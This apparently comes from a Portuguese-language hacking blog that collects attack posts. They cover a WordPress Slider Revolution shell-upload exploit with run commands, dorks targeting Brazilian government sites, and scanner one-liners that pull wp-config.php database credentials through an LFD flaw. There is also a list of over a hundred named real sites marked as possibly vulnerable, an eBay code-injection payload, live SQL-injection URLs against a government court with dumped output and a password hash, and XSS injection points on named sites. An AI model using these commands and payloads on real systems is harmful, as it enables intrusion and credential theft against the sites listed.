Explorando Slider Revolution/Showbiz Pro Shell Upload Exploit

0x===> Slider Revolution/Showbiz Pro Shell Upload Exploit

Bom vamos lá novamente surge um bug critico em um plugin do Wordpress novamente o plugin afetado é o Slider Revolution estima-se que atualmente ele seja o plugin para slider.

[INFO INTERNA DO EXPLOIT]{

Além da vulnerabilidade LFI recentemente que foi publicado há alguns meses, esta é uma outra vulnerabilidade que os desenvolvedores não corrigiram.
Decidiram disponibilizar sem liberar um boletim de segurança completo, deixando milhares de usuários revslider que não atualizam o seu plugin para a versão mais recente (=> 3.0.96) vulnerável a esta falha desagradável, revsliders desenvolvedores irão argumentar o fato de que seu controle vem com um recurso de atualização automática, mas o problema é que este plugin é empacotado com um monte de temas, o que significa que esses temas os usuários podem não conseguir as devidas atualizações de plugins ou terá que pagar para obter a atualização. Em outras palavras desenvolvedores da revslider acredito que cada usuário deve ter o recurso de atualização automática, caso contrário ... você está ferrado.
 Obviamente, isso é muito mais importante do que a vulnerabilidade LFI, pois permite o acesso shell dando atacantes acesso ao sistema de destino bem como a capacidade para despejar todo o banco de dados wordpress localmente.
Dito isto, deve-se atualizar imediatamente para a versão mais recente ou desativar / switch para outro plugin.
Quanto Showbiz Pro, infelizmente a vulnerabilidade nunca foi criado um patched como foi explorada com sucesso na última versão (1.7.1)

}

Download:

Exploit:

http://www.morxploit.com/morxploits/morxrevbiz.pl

Exploit update zip files:

http://www.morxploit.com/morxploits/revslider.zip

http://www.morxploit.com/morxploits/showbiz.zip

Dependências de para uso:

Requires LWP::UserAgent

apt-get install libwww-perl

yum install libwww-perl

perl -MCPAN -e 'install Bundle::LWP'

For SSL support:

apt-get install liblwp-protocol-https-perl

yum install perl-Crypt-SSLeay

Começando a exploração

Primeiro baixaremos o exploit http://1337day.com/exploit/22938

No código do exploit encontramos dois zip's citados acima para baixar:

Fazemos o download dos arquivos na mesma pasta em que o exploit.pl esteja alocado.

Mãos a obra 

0x Comando / Demo: 

1. perl exploit.pl <target> <plugin>
2. perl exploit.pl http://localhost revslider
3. perl exploit.pl http://localhost showbiz
4. perl exploit.pl http://localhost revslider

A primeira forma de explorar essa falha é pegando acesso via terminal nos dando acesso a pasta
"wp-content/plugins/__PLUGIN__/temp/update_extract/__PLUGIN__/"
 (os locais com __PLUGIN__ é o nome do plugin escolhido),
 Depois de tal processo se foi executado com sucesso apos isso é temos acesso ao terminal shell da maquina vulnerável, assim executando comandos como id,ls,wget entre outros.

A segunda maneira que o exploit nos permite obter acesso é por meio de uma webshell que fica alocada em "wp-content/plugins/__PLUGIN__/temp/update_extract/temp.php".

DORK[0] site:.gov.br inurl:/temp/update_extract/ revslider
DORK[1] site:.br inurl:/temp/update_extract/ revslider
DORK[2] site:.br inurl:/temp/update_extract/

Comando compatível com SCANNER INURLBR: 

./inurlbr.php --dork 'site:.gov.br inurl:/temp/update_extract/' -s wordpress.txt -q 1,6 --comand-all 'perl exploitWordpressSlide.pl http://_TARGET_ revslider'

OBS: Para usar tal exploits junto ao scanner inurlbr deve-se modificar tal scritp em seu banner retirando a linha 140 que contem um limpador de tela.
line 140: system(($^O eq 'MSWin32') ? 'cls' : 'clear'); 

SCANNER INURLBR BAIXAR:
https://github.com/googleinurl/SCANNER-INURLBR

WordPress Plugin KenBurner Slider LFD

[0x01] Dando continuidade aos pequenos bugs e grande dores de cabeças do WordPress novamente uma falha de LFD em um plugin usado por muitos sites todavia o afetado dessa vez é o KenBurner Slide a falha é bem semelhante ao do revslider na realidade é a mesma apenas mudando o alvo.
Bom vamos la


[0x02] Explorando com o Scanner inurlbr
Dork Index of /wp-content/plugins/kbslider
Comando
"./inurlbr.php --dork 'Index of /wp-content/plugins/kbslider' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"' "

Resultado e novamente lhe retornara o wp-config.php contendo as infos do mysql do alvo

SCRIPT SCANNER INURLBR=> https://github.com/googleinurl/SCANNER-INURLBR

DD

Procurando site com Simple PHP Blog usando scanner inurl

Simple PHP Blog <= 0.4.0 - Multiple Remote Exploits, 
Vamos usar o scanner inurl para buscar site que possuem o CMS Simple PHP Blog

[ SCANNER INURLBR 1.0 / CONSOLE ]

----------------------------------------------------------------------------------------------------------------------------
0xHOST GOOGLE........: www.google.com.br
0xDORK...............: intext:"Powered by Simple PHP Blog" & inurl:"/blog/" ext:php
0xEXPLOIT............:
0xARQUIVO............: resultado.txt
0xTIPO DE ERRO.......: 2
0xPROCURAR NO ALVO...: Simple PHP Blog
0xIP PROXY...........:
0xPORTA..............:
----------------------------------------------------------------------------------------------------------------------------
0xCARREGANDO CONFIGURAÇÕES...
DEBUG:

Array
(
    [0] => Array
        (
        )

    [host] => www.google.com.br
    [dork] => intext%3A%22Powered+by+Simple+PHP+Blog%22+%26+inurl%3A%22%2Fblog%2F%22+ext%3Aphp
    [arquivo] => resultado.txt
    [tipoerro] => 2
    [exploit] =>
    [achar] => Simple PHP Blog
    [ipProxy] =>
    [porta] =>
    [url] => /search?q=intext%3A%22Powered+by+Simple+PHP+Blog%22+%26+inurl%3A%22%2Fblog%2F%22+ext%3Aphp&num=1900&btnG=Search
    [port] => 80
)

Comando usado no scanner inurl:
php botConsole.php --host='www.google.com.br' --dork='intext:"Powered by Simple PHP Blog" & inurl:"/blog/" ext:php' --arquivo='resultado.txt' --tipoerro='2' --exploit='' --achar='Simple PHP Blog'

ou --achar='Powered by Simple PHP Blog'


Exploit: http://www.exploit-db.com/exploits/1191/

Scanner INURL: http://pastebin.com/TzijC99y

RESULTADO SCANNER POSSÍVEIS VULNERÁVEIS :
TOTAL DE URL's: 179
EXPLOIT USADO:
DORK: intext%3A%22Powered+by+Simple+PHP+Blog%22+%26+inurl%3A%22%2Fblog%2F%22+ext%3Aphp
TOTAL DE POSSÍVEIS VULL: 106
ARQUIVO COM RESULTADO:resultado.txt
LISTA:

http://www.mutualdata.com/blog/index.php
http://www.ashrealms.com/blog/index.php
http://www.gdaa.org.uk/Blog/index.php
http://www.damanicorp.com/blog/index.php?m=10&y=13&entry=entry131012-001437
http://www.damanicorp.com/blog/index.php?m=04&y=07
http://www.traffordbankguesthouse.co.uk/blog/index.php
http://ps.ewi.utwente.nl/Blog/index.php
http://www.aerobiology.ca/blog/index.php
www.aerobiology.ca/blog/index.php
http://www.lofiminds.com/blog/static.php?page=xwung
http://fourseasonsroofingandsiding.com/Roofing-Blog/index.php?category=13
http://www.homesurvey.eu/Blog/index.php
http://www.omegamoon.com/blog/index.php
www.omegamoon.com/blog/index.php
http://www.omegamoon.com/blog/index.php?entry=entry140317-173710
http://boeglin.org/blog/index.php?entry=Flashing-a-BenQ-Z-series-for-free
http://humblecomics.com/blog/index.php
http://www.northernkentuckydancestudio.com/blog/index.php
http://www.ablekidspress.com/blog/index.php
www.ablekidspress.com/blog/index.php
http://courtjones.com/blog/index.php
http://geneyang.com/blog/index.php?entry=entry100524-195255
http://blog.frapu.de/index.php?m=09&y=13&d=&entry=entry130901-200909
http://www.lfpl.org/readers/blog/index.php
www.lfpl.org/readers/blog/index.php
http://shalinsiriwardana.asia/blog/comments.php?y=14&m=01&entry=entry140126-160857
http://www.z80.eu/blog/index.php?entry=entry140316-002012
http://www.rimrockpress.com/blog/index.php?entry=entry110914-115350
www.rimrockpress.com/blog/index.php?entry=entry110914-115350
http://blog.curti.eti.br/stats.php
http://www.donaldsteel.com/blog/index.php
http://www.bbheits.com/blog/index.php
http://www.lautechaee-edu.com/blog/index.php
http://www.bedfordlodge.co.uk/blog.php
www.bedfordlodge.co.uk/
http://www.bignightout.net.nz/blog/index.php?m=11&y=11&entry=entry111120-182043
http://www.createdimage.com.au/blog/index.php?m=01&y=14
http://www.bonniwellmusicmachine.com/blog/static.php?page=MusicMachineVideoBiography
www.bonniwellmusicmachine.com/blog/static.php?page=MusicMachineVideoBiography
http://www.invernessfestivals.com/winter08/blog/index.php?entry=entry131215-100334
www.invernessfestivals.com/winter08/blog/index.php?entry=entry131215-100334
http://www.pluhma.com/blog/index.php?entry=entry000101-205059
http://pdos.csail.mit.edu/scigen/blog/index.php?m=02&y=06
http://www.custom-designbuild.com/blog/index.php?m=02&y=14&entry=entry140215-082241
http://www.masetti.net/blog/archives.php?y=09&m=06
http://www.eliteenglishcentre.es/blog/static.php?page=Welcome
http://blog.hakwerk.com/static.php?page=crazy_it_party
http://www.wetieit.com/blog/index.php?category=1
www.wetieit.com/blog/index.php?category=1
http://theheatersonline.com/blog/index.php
http://fortknox.csc.ncsu.edu/blog/index.php?m=04&y=07&entry=entry070412-140344
http://blog.shuva.in/static.php?page=static070901-005017_about_me
http://www.belgianfamily.com/blog/index.php
http://www.wd5aii.com/blog/index.php?y=13&m=12
http://www.maintsmart.com/Blog/index.php
http://karrkrafts.com/blog/index.php
http://www.pinecountyhistorymuseum.org/blog/index.php
http://william.famille-blum.org/blog/index.php?entry=entry080612-040012
http://www.xandrinho.com/blog/index.php?entry=entry100528-155648
http://www.sbcofficecenter.com/blog/index.php
http://www.soundbysinger.com/audio-blog/index.php
www.soundbysinger.com/audio-blog/index.php
http://www.statetheatreconcerts.com/blog/static.php?page=static100613-122412
www.statetheatreconcerts.com/blog/static.php?page=static100613-122412
http://www.tapestry.co.nz/blog/index.php?entry=entry140123-215640
http://www.serpentbox.com/blog/index.php
http://www.cam-dex.com/blog/index.php
www.cam-dex.com/blog/index.php
http://www.ocsunsetmarina.com/blog/index.php?entry=entry070904-151350
http://www.arrowpipeline.com/blog/index.php?m=12&y=08&entry=entry081221-162738
http://www.africatamed.co.za/blog/comments.php?y=07&m=07&entry=entry070719-153213
http://www.thevacationcalendar.com/Blog/index.php?entry=entry090727-205943
http://www.judocoach.com/blog/index.php?entry=entry130829-103325
www.judocoach.com/blog/index.php?entry=entry130829-103325
http://www.ghostsniper.com/blog/index.php?entry=entry060828-222950
http://www.terraformthemoon.com/blog/index.php?entry=entry110412-005014
http://www.freshstartkz.com/blog/archives.php?y=14&m=03
http://www.freshstartkz.com/blog/archives.php?y=13&m=08
http://www.chrome-lagos.com/blog/index.php?m=10&y=11&entry=entry111010-192213
http://wsanders.net/blog/static.php?page=static070527-095119
http://www.zealsoft.com/blog/index.php?entry=entry051124-083423
http://wiels.nl/blog/index.php
http://www.patopowerparts.com/blog/index.php
http://www.milfordsnowtrekkers.com/blog/index.php
http://www.anglecomm.com/blog/index.php?entry=entry070510-172648
http://www.balishevilla.com/blog/index.php
http://www.asa-houston.org/Projects/Blog-CE/index.php
http://patrickbrennan.net/blog/index.php
http://millerfit.com/blog/index.php
http://www.redkid.net/blog/index.php?entry=entry101111-142242
http://www.och.cc/blog/stats.php
http://mammoth395.com/blog/index.php?entry=entry140213-130501
http://www.kellysheridan.ca/blog/index.php?m=01&y=10
http://www.parkburnguesthouse.co.uk/blog/index.php
http://www.bestpracticesfhc.com/blog/index.php
http://www.emillustration.co.uk/blog/index.php?m=03&y=13&entry=entry130308-180819
http://blog.chinookhelicopters.com/index.php?entry=entry140130-100830
http://www.waltzinghorsefarm.com/blog/index.php
http://www.colonsaybrewery.co.uk/blog/index.php?PHPSESSID=c8cd4e5ca92b1e8b479778772898556f
www.colonsaybrewery.co.uk/blog/index.php?PHPSESSID=c8cd4e5ca92b1e8b479778772898556f
http://www.djdingo.com/blog/contact.php
http://playchesster.com/blog/index.php?entry=entry110914-231540
http://www.nautikites.net/blog/index.php?entry=entry140118-112029
http://berman.nu/blog/index.php?entry=entry080428-235550
http://www.bazayev.com/blog/index.php?entry=entry120327-124716
http://www.bootcampbeach.co.uk/blog/static.php?page=static090501-130242

Hacker demonstra "execução remota de código PHP" vulnerabilidade no site EBay.

Remote Code Execution EBay

Hacker demonstra "execução remota de código PHP" vulnerabilidade no site EBay.

Em um vídeo de demonstração, ele explorou a falha RCE no site eBay, e conseguiu exibir a saída da function nativa do php  phpinfo(), apenas modificando a URL e injetar código.

[URL - ALVO ] https://sea.ebay.com/search/?q=david&catidd=1 

Agora injetando o PHP.
[URL - MODIFICADA] https://sea.ebay.com/search/?q[0]=david&q[1]=sec{${phpinfo()}}&catidd=1


Essa execução só é possível se a página de 'pesquisa' está recebendo "q" valor do parâmetro usando alguma função LOOP como "foreach ()". Muito provavelmente código no final do servidor deve ser algo como:

//php
foreach($_GET['q'] as $dados)
{
 if $dados com sucesso é capaz de ignorar algumas funções de filtro de entrada
{
eval("executar algo aqui  $dados");
}
}
//php

Vídeo:
OBS: A falha já foi corrigida.
Fonte:thehackernews.

VULNERABILIDADE ENCONTRADA, TRIBUNAL DE CONTRAS DO DISTRITO FEDERAL

VULNERABILIDADE ENCONTRADA.

TRIBUNAL DE CONTRAS DO DISTRITO FEDERAL

Parâmetro GET sem filtro algum, é possível executar consultas dentro do banco sem qualquer filtro ou proteção previa.

PARÂMETRO GET NOME:sql


https://www.tc.df.gov.br/sistemas/comps/SQL_consulta.php?sql[COMANDO SQL]&vgRetorna_ID=&titulo=Lista+de+Empresas+Inid%F4neas+ou+Impedidas+de+Negociar&titulo2=&titulo3=&banco=cadin&semLogar=1&largMaxCol=35&retornoSQL=1&vgIdCons=52&menuIncludePHP=&menuIncludeHTM=&vgNovaJanela=&vgNaoFiltra=&vgSemRodape=1

Executando comandos.
COMANDO: show databases;

https://www.tc.df.gov.br/sistemas/comps/SQL_consulta.php?sql=show+databases%3B&vgRetorna_ID&titulo=Lista+de+Empresas+Inid%F4neas+ou+Impedidas+de+Negociar&titulo2&titulo3&banco=cadin&semLogar=1&largMaxCol=35&retornoSQL=1&vgIdCons=52&menuIncludePHP&menuIncludeHTM&vgNovaJanela&vgNaoFiltra&vgSemRodape=1
=======================================

COMANDO show tables;

https://www.tc.df.gov.br/sistemas/comps/SQL_consulta.php?sql=show+tables%3B&vgRetorna_ID&titulo=Lista+de+Empresas+Inid%F4neas+ou+Impedidas+de+Negociar&titulo2&titulo3&banco=cadin&semLogar=1&largMaxCol=35&retornoSQL=1&vgIdCons=52&menuIncludePHP&menuIncludeHTM&vgNovaJanela&vgNaoFiltra&vgSemRodape=1
=======================================

COMANDO: SHOW VARIABLES;
https://www.tc.df.gov.br/sistemas/comps/SQL_consulta.php?sql=SHOW+VARIABLES%3B&vgRetorna_ID&titulo=Lista+de+Empresas+Inid%F4neas+ou+Impedidas+de+Negociar&titulo2&titulo3&banco=cadin&semLogar=1&largMaxCol=35&retornoSQL=1&vgIdCons=52&menuIncludePHP&menuIncludeHTM&vgNovaJanela&vgNaoFiltra&vgSemRodape=1
=======================================

COMANDO: select user();
https://www.tc.df.gov.br/sistemas/comps/SQL_consulta.php?sql=select+user%28%29%3B&vgRetorna_ID&titulo=Lista+de+Empresas+Inid%F4neas+ou+Impedidas+de+Negociar&titulo2&titulo3&banco=cadin&semLogar=1&largMaxCol=35&retornoSQL=1&vgIdCons=52&menuIncludePHP&menuIncludeHTM&vgNovaJanela&vgNaoFiltra&vgSemRodape=1
=======================================

COMANDO: SHOW PROCESSLIST;
https://www.tc.df.gov.br/sistemas/comps/SQL_consulta.php?sql=SHOW+PROCESSLIST%3B&vgRetorna_ID&titulo=Lista+de+Empresas+Inid%F4neas+ou+Impedidas+de+Negociar&titulo2&titulo3&banco=cadin&semLogar=1&largMaxCol=35&retornoSQL=1&vgIdCons=52&menuIncludePHP&menuIncludeHTM&vgNovaJanela&vgNaoFiltra&vgSemRodape=1
=======================================



BANCO:
myConsulta

TABELAS:
Tables_in_myConsulta
coluna
con1
con10
con100
con101
con102
con103
con104
con105
con106
con107
con108
con109
con11



Variable_name Value
back_log 50
basedir /usr/
bdb_cache_size 8388600
bdb_home /var/lib/mysql/
bdb_log_buffer_size 32768
bdb_logdir
bdb_max_lock 10000
bdb_shared_data OFF
bdb_tmpdir /tcdf/temp/tmpMysql/
binlog_cache_size 32768
bulk_insert_buffer_size 8388608
character_set_client latin1
character_set_connection latin1
character_set_database utf8


Id User Host db Command Time State Info
7720512 userCon localhost myConsulta Query 0 SHOW PROCESSLIST



Grants for userCon@localhost
GRANT USAGE ON *.* TO 'userCon'@'localhost' IDENTIFIED BY PASSWORD '0be2b4be35a0fec8'
GRANT ALL PRIVILEGES ON `myConsulta`.* TO 'userCon'@'localhost' WITH GRANT OPTION

Contribuição do leitor.

Contribuição do leitor.

http://verdesmares.globo.com/v3/canais/noticias_enviar.asp?codigo=173190&modulo=808&titulo=http://ipanorama.globo.com/plantao/caderno_especial/enviar.asp?codigo=52641&titulo=[XSS]
*
horoscopo.ego.globo.com/ctl.php?mdl=Sinastria&cmd=[XSS]
*
http://www.voegol.com.br/pt-br/busca/Paginas/resultado-da-busca.aspx?PC=[XSS]
*
http://kr.arsenal.com//member/member_login.asp?url=[XSS]
*
http://www2.portoalegre.rs.gov.br/smdhsu/default.php?reg=80&p_secao=1%20target=[XSS]
*
http://www2.portoalegre.rs.gov.br/turismo/default.php?p_secao=[XSS]
*
http://www2.warnerbros.com/web/all/link/partner.jsp?url=[XSS]
*
http://www.redtube.com/iframe/tower/fling025/index.php?clickTAG=[XSS]

*
http://www.fiat.md/news/poln.php?id=[XSS]
*
http://www.mtv.com/global/mobile/widgets/mobile_web.jhtml?url=http://m.mtv.com&css=[XSS]
*
http://www.educacao.rs.gov.br/pse/html/noticias_det.jsp?ID=[XSS]
http://to.gov.br/busca/[XSS]
*
http://www.fazenda.gov.br/confaz/frameset.asp?pagina=http://blog.inurl.com.br/

Site: www.redemet.aer.mil.br vulnerabilidade

Este resumo não está disponível. Clique aqui para ver a postagem.